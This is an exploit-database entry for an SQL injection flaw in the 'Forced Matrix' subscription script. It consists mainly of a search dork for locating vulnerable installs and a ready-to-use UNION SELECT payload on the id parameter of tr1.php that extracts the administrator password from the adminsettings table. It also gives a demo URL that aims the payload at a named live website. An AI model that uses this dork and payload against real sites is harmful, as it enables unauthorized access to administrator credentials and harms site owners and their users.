id: 4019
date: 11/01/2008
title: YourFreeWorld Forced Matrix Script (id) SQL Injection Vulnerability
author: Hussin X
cves: 

===================================================================
YourFreeWorld Forced Matrix Script (id) SQL Injection Vulnerability
===================================================================


Forced Matrix Script ( id ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X
___________________________________

script    : http://www.yourfreeworld.com/script/subscriptionforcedmatrix.php

DorK   : inurl:"tr1.php?id=" Forced Matrix

Exploit :
_______

tr1.php?id=-19+union+select+1,2,3,password,5,6,7,8,9,10+from+adminsettings--




Demo :
_______

http://www.autowebhits.com/subscriptionforcedmatrixt/tr1.php?id=-19+union+select+1,2,3,password,5,6,7,8,9,10+from+adminsettings--




#  0day.today [2023-03-26]  #